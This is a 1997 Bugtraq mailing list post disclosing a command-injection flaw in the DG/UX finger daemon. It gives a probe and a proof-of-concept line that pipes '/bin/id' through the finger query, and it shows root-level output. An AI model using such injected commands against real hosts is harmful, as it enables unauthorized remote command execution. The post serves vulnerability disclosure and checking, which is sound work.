Home page logo
/

bugtraq logo Bugtraq mailing list archives

dgux in.fingerd vulnerability
From: gti () HOPI DTCC EDU (George Imburgia)
Date: Mon, 11 Aug 1997 12:32:38 -0400


Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W () host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id () host"

Often, you will see something like this;

uid=0(root) gid=0(root)

or;

uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault